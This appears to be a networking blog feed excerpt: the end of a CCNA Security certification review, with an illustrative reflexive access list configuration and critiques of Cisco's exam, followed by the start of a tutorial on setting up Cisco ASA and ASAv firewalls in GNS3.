<a href="https://www.cisco.com/c/en/us/td/docs/net_mgmt/cisco_secure_access_control_system/5-6/user/guide/acsuserguide/eap_pap_phase.html" rel="external" title="Authentication in ACS (Cisco)"><span class="caps">ACS</span> online documentation</a><sup id="fnref-acs-version"><a class="footnote-ref" href="#fn-acs-version">1</a></sup>.</p>
</li>
<li>
<p><span class="caps">PVLAN</span> was meant to be covered in chapter 9 according to the tables at the
beginning of the book, but it was forgotten.
See <a href="https://www.youtube.com/watch?v=tbG9YboATvA" rel="external" title="Private VLAN tutorial and demonstration (YouTube)">this video</a> by Keith Barker.</p>
</li>
<li>
<p>Reflexive Access Lists are also never mentioned in the book while tested
in the exam.
They are not a complicated topic, but not so easy that you can just assume
that everybody already knows them.
Check this <a href="https://www.youtube.com/watch?v=ZptZy0EgUnI" rel="external" title="Reflexive Access Lists">short video</a> also by Keith Barker.</p>
</li>
<li>
<p>Extranet VPNs: usually they are considered as a kind of <span class="caps">DMZ</span>, but in Cisco’s
world extranet VPNs provide direct access to a company’s internal network.
This is the “historical occasional definition” stated in
<a href="https://en.wikipedia.org/wiki/Extranet" rel="external" title="Extranet (Wikipedia)">Wikipedia</a> and also explained in
<a href="http://www.ciscopress.com/articles/article.asp?p=24833" rel="external" title="Overview of VPNs and VPN Technologies (Cisco)">Cisco documentation</a>.
This is often asked in one form or another; it is not complicated,
but if you come to the exam with the common definition of extranets you
will fail.</p>
</li>
<li>
<p>Firewalls are covered in this book, fortunately, but they are covered
incompletely as per the exam requirements:</p>
<ul>
<li>
<p>You are expected to know the limitations potentially affecting
multicast handling:</p>
<ul>
<li>Zone-based firewalls: filtering of multicast traffic is
<a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_data_zbf/configuration/xe-3s/sec-data-zbf-xe-book/sec-zone-pol-fw.html" rel="external" title="Zone-Based Policy Firewalls (Cisco)">not supported</a> (search for “multicast” in the linked
page).
Control Plane Policing is the only way to go in this case.</li>
<li><span class="caps">ASA</span> firewalls: filtering of multicast traffic is
<a href="https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/115804-asa-multi-probs-00.html" rel="external" title="ASA Multicast Troubleshooting and Common Problems (Cisco)">supported</a> (this link serves only as a reference to
show it is supported, you are not expected to know the details).</li>
</ul>
</li>
<li>
<p>You are expected to be familiar with <span class="caps">ASA</span> Security Contexts, know what
they are and why they are used.
Read this <a href="http://www.ciscopress.com/articles/article.asp?p=426641" rel="external" title="Cisco ASA Security Contexts (Cisco)">Cisco documentation</a>.</p>
</li>
<li>
<p>You must also be familiar with the Cisco <span class="caps">ASA</span> Accelerated Security Path
(<span class="caps">ASP</span>).
Sadly, the blog I used as a resource is now closed, so you’re on your
own for this one, but there are many resources available online.</p>
</li>
</ul>
</li>
</ul>
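<p>As an added illustration of what the reflexive access list item above refers to (this configuration is not taken from the original post, from the official cert guide or from Cisco’s documentation; the interface name <code>GigabitEthernet0/1</code> and the list names <code>OUTBOUND</code>, <code>INBOUND</code>, <code>TCP-REFLECT</code>, <code>UDP-REFLECT</code> and <code>ICMP-REFLECT</code> are assumed), here is a minimal router configuration where sessions initiated from the inside are recorded as temporary reflexive entries, and only the matching return traffic is allowed back in through the outside interface:</p>

```cisco
! Assumed names: Gi0/1 is the outside interface, OUTBOUND/INBOUND are the
! interface ACLs and *-REFLECT are the reflexive lists they create/evaluate.
!
! Outbound traffic: every permitted session creates a mirrored, temporary
! entry (swapped addresses and ports) in the named reflexive list. The entry
! is removed when the TCP session closes or when the idle timeout expires.
ip access-list extended OUTBOUND
 permit tcp any any reflect TCP-REFLECT timeout 300
 permit udp any any reflect UDP-REFLECT timeout 60
 permit icmp any any reflect ICMP-REFLECT timeout 30
!
! Inbound traffic: "evaluate" inserts the dynamic entries at this position,
! so only return traffic of inside-initiated sessions passes. Anything else
! falls through to the final deny, which is logged so that the behaviour can
! be checked from the console while studying.
ip access-list extended INBOUND
 evaluate TCP-REFLECT
 evaluate UDP-REFLECT
 evaluate ICMP-REFLECT
 deny ip any any log
!
interface GigabitEthernet0/1
 description Outside
 ip access-group OUTBOUND out
 ip access-group INBOUND in
!
! Default idle timeout for reflexive entries that do not specify their own.
ip reflexive-list timeout 120
```

<p>After an inside host opens a connection through the router, <code>show access-lists TCP-REFLECT</code> lists the temporary <code>permit tcp host … eq … host … eq …</code> entry with its remaining timeout, and it disappears once the session ends. Two caveats worth remembering for the exam: <code>evaluate</code> only works inside a named extended access list, and reflexive lists only track addresses and ports, so protocols which negotiate a second channel on the fly (active <span class="caps">FTP</span> is the classic case) are not handled; that is where stateful inspection (<span class="caps">CBAC</span> or zone-based firewalls) takes over.</p>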
<p>Maybe you noticed that I was often referring to Keith Barker’s videos.
He is a presenter for <span class="caps">CBT</span> Nuggets videos.
The videos I linked here are free samples, but you can find the complete
set on the <a href="https://www.cbtnuggets.com/it-training/cisco-ccna-security-210-260" rel="external" title="Cisco CCNA Security 210-260 IINS (CBT Nuggets)"><span class="caps">CBT</span> Nuggets website</a>.
You can use them to complete your knowledge; moreover, new members benefit
from a free 7-day trial period, so it may not even cost you any money.</p>
<h3 id="personal-impressions"><a class="toclink" href="#personal-impressions">Personal impressions</a></h3>
<h4 id="curriculum"><a class="toclink" href="#curriculum">Curriculum</a></h4>
<p>The curriculum associated with this exam matches the goal expressed at the
beginning of this post, as it allows someone starting in the realm of network
security and / or starting with Cisco’s network security technologies to
effectively deepen his knowledge on the subject.</p>
<p>However, personally I have two reservations:</p>
<ul>
<li>The topic list provided by Cisco is too vague.</li>
<li>It focuses too much on Cisco product usage at the expense of more
general background knowledge.</li>
</ul>
<p>Let’s see each of these reservations in more detail.</p>
<h5 id="the-topics-list-is-too-vague"><a class="toclink" href="#the-topics-list-is-too-vague">The topics list is too vague</a></h5>
<p>First, both Cisco’s <a href="https://learningnetwork.cisco.com/community/certifications/security_ccna/iins-v3/exam-topics" rel="external" title="IINS Exam Topics (Cisco)">topics list</a> and official cert guide are really
too vague about what is actually expected from the student.</p>
<p>Yes, the topic list has Cisco’s usual disclaimer:</p>
<blockquote>
<p>The following topics are general guidelines for the content likely to be
included on the exam.
However, other related topics may also appear on any specific delivery of
the exam.
In order to better reflect the contents of the exam and for clarity
purposes, the guidelines below may change at any time without notice.</p>
</blockquote>
<p>This was also the case for the <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching</a> exam,
but while in the latter this disclaimer actually covered a few secondary
questions about knowledge that one is expected to gain during any normal
training and wouldn’t prevent a candidate from passing, here Cisco really seems
to go free-style regarding the choice of tested topics.</p>
<p>As this is a common criticism regarding this certification, I remember a <span class="caps">CCIE</span>
on a forum who explained that this is a good thing because the more you
learn, the more you know, and one should not study with the exam as a goal,
giving as an example the <span class="caps">CCIE</span> curriculum where the topics are deliberately very vague.</p>
<p>I do not agree at all with such statements.
The <span class="caps">CCNA</span> is an entry-level certification and the <span class="caps">CCIE</span> is an expert-level
one; you cannot compare them as they are two different beasts.</p>
<p>In entry-level certifications, the student needs to know precisely what
he has to study so he does not lose precious time on off-topic subjects
while missing important on-topic subjects (time is always playing against
any student).
Of course, given an infinite amount of time, the student could become an
expert in every topic before passing the <span class="caps">CCNA</span> exam, but this is not what
is expected: there is an upper bound in each topic which must be clearly
indicated.
The student remains free to investigate beyond this upper bound if time
allows him such additional research, and this may also provide insightful
background information about on-topic subjects, but this remains
<em>additional</em> research.</p>
<p>In expert-level certifications, there is basically no upper-bound anymore:
you are meant to be an expert on the listed topics.
For the domains where you are only required to be familiar with the “common
features” of something, your position should allow you to determine what
features are “commonly” found in the industry, which a candidate for an
entry-level certification is most likely unable to do.
For the domains where you are required to have a thorough knowledge, there
is effectively no upper-bound and you could be asked about any aspect of
the subject.
Of course you are not expected to know everything, which means you won’t
reach 100% score as you may potentially do in a lower-level exam, but the
gaps in your knowledge should be small enough to allow you to stay over the
required score.</p>
<p>Without a proper topic list or, at least, a proper certification guide, it is
just impossible for a self-learner to pass this exam.
That’s why you may have to check online either for specially created
training questions or for old exams (by the way, the <span class="caps">IINS</span> exam currently labeled
210-260 was previously labeled 640-554; this may help you find older material
which, while not up to date, may still help you more accurately
determine what is expected from the student, as the main topics remained the same).</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Don’t fall into the trap of learning the questions and answers and hoping to
pass only with that knowledge.</p>
<p>This is stupid (see my <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a> on certifications) and
most likely useless as Cisco regularly generates new batches of questions
with either new questions or, more subtly, the same question with
a slight variation (a change in host names, numbers, etc.) making the
correct answer change in an otherwise similar-looking question.</p>
<p>As I said in the <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a>, don’t forget that you study
for yourself, to develop your own aptitudes in domains you are supposed to
like and be good at.</p>
</div>
<h5 id="curriculum-too-focused-on-cisco-product-usage"><a class="toclink" href="#curriculum-too-focused-on-cisco-product-usage">Curriculum too focused on Cisco product usage</a></h5>
<p>The <span class="caps">CCNA</span> R&S curriculum is <span class="caps">IMHO</span> a perfect example of a curriculum where the
theoretical and practical content are well balanced.
In the <span class="caps">CCNA</span> R&S, you begin by learning for instance a protocol: why it is
needed, how it works, and then finally you learn how to implement it using
Cisco technologies.</p>
<p>The <span class="caps">CCNA</span> Security curriculum, on the other hand, focuses more heavily on Cisco
products.
I’m not saying that there is no theoretical knowledge at all, on the contrary
the details of IPsec for instance and its comparison with <span class="caps">SSL</span>-based VPNs are
very well developed and very interesting, and I suppose that someone new in
the security area will also enjoy the parts about the threats and <span class="caps">PKI</span>
infrastructures, but the theoretical knowledge does not go very far beyond that.</p>
<p>After that, the curriculum seems to boil down to a catalogue of features,
each one with its own succession of screenshots, web interface menus and
command-line options to learn.</p>
<ul>
<li>The threats remain theoretical: you are solving problems you do not
know in practice and have never experienced or verified for yourself.
In other words, you are rather taught <em>good practices</em>.</li>
<li>The features are analyzed individually, with very little perspective on
the global network architecture and on how the elements are organized and
interact with each other.
For instance, individual chapters describe centralized authentication, <span class="caps">SCEP</span>
and site-to-site <span class="caps">VPN</span>, but how to securely combine them is
off-topic (though most probably covered in the <span class="caps">CCNP</span> curriculum).</li>
</ul>
<p>Depending on your affinities and the reasons why you chose a <span class="caps">CCNA</span> Security
certification, I would recommend accompanying this certification with
at least one other:</p>
<ul>
<li>
<p>If you are more interested in the security aspect, you should greatly
benefit from a general security certification, like a <a href="/posts/2017/10/04/ec-council-ceh-certification-review/" title="EC-Council CEH certification review"><span class="caps">CEH</span></a> for instance.
This will give you a better understanding of the threats, allowing you to
take more appropriate decisions.</p>
</li>
<li>
<p>If you are more interested in Cisco technologies, I think you should take
the step and push toward the <span class="caps">CCNP</span> Security.
I did not take this one so I cannot vouch for it, but it should allow you
to become more intimate with Cisco technologies than the introduction
provided in the <span class="caps">CCNA</span>, making you more efficient and more apt to take the
right decisions or react correctly in case of unforeseen events.</p>
</li>
</ul>
<h4 id="exam"><a class="toclink" href="#exam">Exam</a></h4>
<p>Similarly to the <span class="caps">CCNA</span> R&S, the questions themselves are clear and unambiguous,
even though, as mentioned above, they follow a topic list which noticeably differs
from the one available on Cisco’s website and in its official certification guide.</p>
<p>As a self-learner, you must therefore do your own investigations to discover the
topics actually covered by the exam.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Having been through this myself, I’ve shared with you in this post the
complete list of topics which I found to be asked in <span class="caps">CCNA</span> Security exams and
missing from Cisco’s official certification guide.</p>
<p>So <em>maybe</em> this list will save you some investigation time so you can
focus more on your study; at least I hope so!</p>
<p>Don’t take it for granted, though, as Cisco regularly updates its question
sets and may include new, unmentioned topics.</p>
</div>
<p>The exam engine is… crap.</p>
<p>Yeah, I already knew it from my <span class="caps">CCNA</span> R&S exam so I was expecting the broken
<span class="caps">XML</span> tags and attributes in the questions and answers, but here I got a <span class="caps">BSOD</span>,
a Windows Blue Screen of Death right in the middle of the exam (while the
engine was loading a simulation lab).</p>
<p>How is it even possible that a simple exam engine could make the whole
operating system crash?</p>
<p>Needless to say I was very worried, and my first reaction was, breaking the rules,
to get up directly and fetch one of the people in charge of the exam center, less to
get technical assistance than to get an official witness in case I failed
the exam because of this.</p>
<p>Fortunately, once Windows restarted, the exam went on as usual, at the
current question, current time and keeping all previously saved answers.
What a relief, but still: this is not what I would call good or comfortable
exam conditions<sup id="fnref-exam_bugs"><a class="footnote-ref" href="#fn-exam_bugs">3</a></sup>.</p>
<h4 id="conclusion"><a class="toclink" href="#conclusion">Conclusion</a></h4>
<p>Unless you need this very certification to meet some <span class="caps">US</span> governmental contract
prerequisites, I would not recommend taking this certification alone.</p>
<p>I would however recommend it mainly in those two situations:</p>
<ul>
<li>
<p>As a complement to a more general security learning path, to dig a bit
deeper into some protocols such as IPsec which are often mentioned but rarely
studied elsewhere, and to familiarize yourself with Cisco’s approach to security.
This is why I chose it personally, and I really don’t regret it.</p>
</li>
<li>
<p>As a first step to get your <span class="caps">CCNP</span> Security and become an actual Cisco
Security Professional.</p>
</li>
</ul>
<div class="footnote">
<hr/>
<ol>
<li id="fn-acs-version">
<p>This link leads to the documentation of version 5.6 of <span class="caps">ACS</span>.
To access a different version, or if this one is not found, simply change the
version number in the <span class="caps">URL</span>, as the path itself remains constant over <span class="caps">ACS</span> versions. <a class="footnote-backref" href="#fnref-acs-version" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-failure">
<p>Some gossip says that this may be a deliberate move from Cisco in
order to bill more exams and put forward their official, expensive training
sessions.
Personally, I believe in
<em>“Don’t see malignity where there is just stupidity”</em> and I think that Cisco
just does not care.
There is too little money to be made on people training with books and free
simulators, so there is no business reason to invest money in them either.
This is not a matter of thinking of strategies to push people to pay more; this
is simply a matter of reducing funding where the <span class="caps">ROI</span> is not profitable enough. <a class="footnote-backref" href="#fnref-failure" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
<li id="fn-exam_bugs">
<p>I passed nearly a dozen exams in the same test center, and I
encountered such issues only with Cisco exams.
These issues therefore seem unrelated to the exam center itself but really
caused by Cisco’s specific exam engine. <a class="footnote-backref" href="#fnref-exam_bugs" title="Jump back to footnote 3 in the text">↩</a></p>
</li>
</ol>
</div>How to install Cisco Adaptative Security Appliance (ASA) in GNS32017-08-28T00:00:00+02:002017-08-28T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/<p>The Cisco <em><a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html" rel="external" title="Cisco Adaptive Security Appliance (ASA) Software homepage (Cisco)">Adaptive Security Appliance</a></em> (<abbr title="Adaptive Security Appliance"><span class="caps">ASA</span></abbr>) is Cisco’s main
firewall and network security product.
It mainly provides firewall and <span class="caps">VPN</span> services, but its native features can be
enhanced with the addition of <a href="https://www.cisco.com/c/en/us/products/security/ngips/index.html" rel="external" title="Next-Generation Intrusion Prevention System (NGIPS) (Cisco)">FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr></a> services
<a href="https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html" rel="external" title="Cisco ASA 5500-X with FirePOWER Services (Cisco)">on top of it</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Even when used on top of an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in the same appliance, the FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr>
is never really merged within the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> but stays a separate module.
For instance, the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and the FirePOWER each have their own separate <span class="caps">CLI</span>
shell, each with their own different syntax and logic.
In fact FirePOWER is not a Cisco development but has been acquired when
Cisco merged with SourceFire, hence the (personal) feeling of an “alien”
product plugged into the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</p>
<p>For <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security students, while you must know <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and be comfortable with
its usage, as for now you only need to know what FirePOWER is and why it is used …</p></div><p>The Cisco <em><a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html" rel="external" title="Cisco Adaptative Security Appliance (ASA) Software homepage (Cisco)">Adaptative Security Appliance</a></em> (<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>) is Cisco’s main
firewall and network security product.
It mainly provides firewall and <span class="caps">VPN</span> services, but its native features can be
enhanced with the addition of <a href="https://www.cisco.com/c/en/us/products/security/ngips/index.html" rel="external" title="Next-Generation Intrusion Prevention System (NGIPS) (Cisco)">FirePOWER <abbr title="Next-Generation Intrusion Prevention System"><span class="caps">NGIPS</span></abbr></a> services
<a href="https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html" rel="external" title="Cisco ASA 5500-X with FirePOWER Services (Cisco)">on top of it</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Even when it runs on top of an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in the same appliance, the FirePOWER <abbr title="Next-Generation Intrusion Prevention System"><span class="caps">NGIPS</span></abbr>
is never really merged into the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> but stays a separate module.
For instance, the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and the FirePOWER module each have their own <span class="caps">CLI</span>
shell, each with its own syntax and logic.
In fact FirePOWER is not a Cisco development: it came with Cisco’s acquisition of
Sourcefire, hence the (personal) feeling of an “alien”
product plugged into the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</p>
<p>For <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security students, while you must know <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and be comfortable with
its usage, as for now you only need to know what FirePOWER is and why it is used.</p>
</div>
<p>Cisco <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> can be obtained from various channels:</p>
<ul>
<li>
<p>Cisco <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> entry-level devices target the <abbr title="Small Office / Home Office"><span class="caps">SOHO</span></abbr> market and can be bought
second-hand for a few dozen dollars, or brand new for a few hundred.</p>
</li>
<li>
<p>As with <span class="caps">IOS</span> devices, it is possible to extract the required files
from an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device and use them in a virtualized environment.
As far as the <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security curriculum is concerned, even old images
are enough for your studies.
Being real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images, they provide the same functionality and react the
same way as real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> appliances (including their vulnerabilities, so keep such
a lab isolated from production networks).</p>
</li>
<li>
<p>For training purposes, Cisco’s network simulator <span class="caps">VIRL</span> provides ASAv, an
<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> simulator.
However, as with any simulator, it may not offer the same features
(last time I checked, for instance, failover was not supported) or react
the same way as real gear.</p>
</li>
</ul>
<p>The <span class="caps">GNS3</span> project doesn’t recommend using <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images but advises using ASAv
instead.
Personally I did not encounter any issue with the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images, but that’s most
probably because I was satisfied with an old image (<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4.2) and basic
features.
These are enough for a <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security training.</p>
<h3 id="prerequisites"><a class="toclink" href="#prerequisites">Prerequisites</a></h3>
<p>To install <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> you will need the:</p>
<ul>
<li>
<p><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> itself, depending on the version you chose:</p>
<ul>
<li>real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>: you need its Linux kernel (<em>asa842-vmlinuz</em> for instance) and
Initial <span class="caps">RAM</span> disk (<em>asa842-initrd.gz</em> for instance) files.</li>
<li>ASAv emulator: it usually comes as a virtual machine file, such as
<em>asav9</em>*<em>.qcow2</em>.</li>
</ul>
</li>
<li>
<p><abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>: this is the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">GUI</span>, coming as a file such as <em>asdm-7</em>*<em>.bin</em>.
Be sure to <a href="http://www.cisco.com/c/en/us/td/docs/security/asa/compatibility/asamatrx.html#48552" rel="external" title="ASA and ASDM Compatibility (Cisco)">check</a> that the versions of <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> and <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> you are
using are compatible.</p>
</li>
<li>
<p>A Windows host or virtual machine to administer the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</p>
</li>
<li>
<p>Java must be installed on the Windows host.</p>
</li>
<li>
<p>A <span class="caps">TFTP</span> server for Windows (such as <a href="http://tftpd32.jounin.net/tftpd32_download.html" rel="external" title="tftpd32 project homepage">tftpd32</a>, a portable edition is
available which does not require installation on the host).</p>
</li>
</ul>
<p>Setting up an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server requires three steps:</p>
<ol>
<li>Booting <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</li>
<li>Configuring <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</li>
<li>Copy <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> onto the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</li>
</ol>
<h3 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h3>
<h4 id="booting-asa"><a class="toclink" href="#booting-asa">Booting <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr></a></h4>
<h5 id="asa-84"><a class="toclink" href="#asa-84"><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4</a></h5>
<p>Setting-up <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in <span class="caps">GNS3</span> is described by Anthony Sequeira in
<a href="https://www.youtube.com/watch?v=ubyZGXjUsjs" rel="external" title="MicroNugget: The ASA in GNS3 (YouTube)">this video</a>, in particular from the fourth minute onward.
While this video relies on an old version of <span class="caps">GNS3</span>, the process remains similar:</p>
<ol>
<li>From <span class="caps">GNS3</span> toolbar, go in <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> window.</li>
<li>In the <em><span class="caps">QEMU</span></em> > <em>Qemu VMs</em> section, click the <em>New</em> button to create a new
virtual machine.</li>
<li>Be sure to tick the <em>This is a legacy <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">VM</span></em> checkbox.
<span class="caps">GNS3</span> may display a warning recommending to use ASAv instead, but this is
fine (see my comment above on this subject).</li>
<li>Keep the default values for the <span class="caps">RAM</span> amount and console type; when asked
about the disk image, choose to generate a new disk image.
<span class="caps">GNS3</span> should display a <em>Create</em> button to create the image directly from
within <span class="caps">GNS3</span>.
Here again, default values are fine.</li>
<li>Select the location of your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> kernel and Initial <span class="caps">RAM</span> disk files.</li>
<li>Once the device template is created, go in its settings and, under the
<em>Advanced</em> tab, uncheck <em>Use as a linked base <span class="caps">VM</span></em> (we will check this
option back once the installation is complete,
<a href="/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ol>
<h5 id="asav"><a class="toclink" href="#asav">ASAv</a></h5>
<p>Valerian Ceaus made a <a href="http://blog.ialex.info/configuring-cisco-asav-9-x-on-gns3-1-4-x/" rel="external" title="Configuring Cisco ASAv 9.x on GNS3 1.4.x (DNT team blog)">nice article</a> about running ASAv in <span class="caps">GNS3</span>.</p>
<p>You need to follow those steps:</p>
<ol>
<li>Define a new Qemu <span class="caps">VM</span>, but this time leave <em>This is a legacy <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">VM</span></em>
unchecked to create a standard Qemu virtual machine.</li>
<li><em><span class="caps">RAM</span></em>: 2048 <span class="caps">MB</span></li>
<li><em>Console type</em>: vnc</li>
<li><em>Disk image</em>: Browse to your ASAv image file.</li>
<li>Edit the properties of the newly created virtual machine:<ul>
<li><em>General settings</em><ul>
<li><em>Symbol</em>: asa</li>
<li><em>Category</em>: Security devices</li>
<li><em><span class="caps">RAM</span></em>: 2048 <span class="caps">MB</span></li>
<li><em>Console type</em>: vnc</li>
</ul>
</li>
<li><em>Network</em>:<ul>
<li><em>Adapters</em>: 4</li>
</ul>
</li>
<li><em>Advanced settings</em><ul>
<li><em>Optimizations</em><ul>
<li><em>Activate <span class="caps">CPU</span> throttling</em>: <span class="caps">YES</span></li>
<li><em>Percentage of <span class="caps">CPU</span> allowed</em>: 80 %</li>
</ul>
</li>
<li><em>Additional settings</em><ul>
<li><em>Options</em> = <code>-cpu Haswell -smp 4,sockets=4,cores=1,threads=1 -k fr</code>
(change <code>-k fr</code> to whatever your keyboard layout is;
available layouts are usually stored in the
<em>/usr/share/qemu/keymaps/</em> directory).</li>
<li><em>Use as a linked base <span class="caps">VM</span></em>: <span class="caps">NO</span> (we will re-enable it at the end
of the installation process,
<a href="/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ol>
<p>ASAv devices use <span class="caps">VNC</span> console by default.
If you prefer to switch to a serial (“telnet” from <span class="caps">GNS3</span> point-of-view) console,
<a href="http://blog.ialex.info/configuring-cisco-asav-9-x-on-gns3-1-4-x/" rel="external" title="Configuring Cisco ASAv 9.x on GNS3 1.4.x (DNT team blog)">Valerian</a> already gives some information but you may want to read this
<a href="https://gns3.com/discussions/how-to-configure-any-asav-qcow2-" rel="external" title="How to configure any ASAv .qcow2 image for serial telnet access (GNS3 forum)"><span class="caps">GNS3</span> forum thread</a>.</p>
<h4 id="asa-initial-configuration"><a class="toclink" href="#asa-initial-configuration"><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> initial configuration</a></h4>
<p>Create a new topology and use a standard <span class="caps">GNS3</span> switch to link your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device
with the Windows host you will use to manage it.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology including an ASA server, a basic switch and a Windows host" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/topology.png"/></a></span></p>
<p>Start the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device.
Once it has booted, use <code>enable</code> to switch into privileged <span class="caps">EXEC</span> mode.
The enable password is empty by default (just press <em>Enter</em> when
prompted for a password).
This is fine for an isolated lab, but do not leave it empty on a device reachable
from other hosts.</p>
<p>Available network interfaces should usually bear a name such as
<em>GigabitEthernet 0</em> or <em>Management0/0</em>.
The command to check available network interfaces is the same as on <span class="caps">IOS</span> devices:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">show</span> interface ip brief
<span class="go">Interface IP-Address OK? Method Status Protocol</span>
<span class="go">GigabitEthernet0 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet1 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet2 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet3 unassigned YES unset administratively down up</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<p>Use the commands below to configure the network interface linking toward the
Windows management host (on ASAv use <code>int gi 0/0</code> to configure the first
network interface):</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">conf</span> t
<span class="gp">ciscoasa(config)#</span>
<span class="go">***************************** NOTICE *****************************</span>
<span class="go">Help to improve the ASA platform by enabling anonymous reporting,</span>
<span class="go">which allows Cisco to securely receive minimal error and health</span>
<span class="go">information from the device. To learn more about this feature,</span>
<span class="go">please visit: http://www.cisco.com/go/smartcall</span>
<span class="go">Would you like to enable anonymous error reporting to help improve</span>
<span class="go">the product? [Y]es, [N]o, [A]sk later: </span><span class="s">n</span>
<span class="go">In the future, if you would like to enable this feature,</span>
<span class="go">issue the command "call-home reporting anonymous".</span>
<span class="go">Please remember to save your configuration.</span>
<span class="gp">ciscoasa(config)# </span><span class="k">int</span><span class="s"> gi 0</span>
<span class="gp">ciscoasa(config-if)# </span><span class="k">ip</span> add <span class="s">192.168.0.1</span> <span class="s">255.255.255.0</span>
<span class="gp">ciscoasa(config-if)# </span><span class="k">nameif </span><span class="nv">inside</span>
<span class="go">INFO: Security level for "inside" set to 100 by default.</span>
<span class="gp">ciscoasa(config-if)# </span><span class="ow">no </span><span class="k">shutdown</span>
<span class="gp">ciscoasa(config-if)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa(config)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa# </span><span class="k">copy</span> run start
<span class="go">Source filename [running-config]?</span>
<span class="go">Cryptochecksum: d78cc3c3 00c1ebd8 dbc3b1cd 61811d56</span>
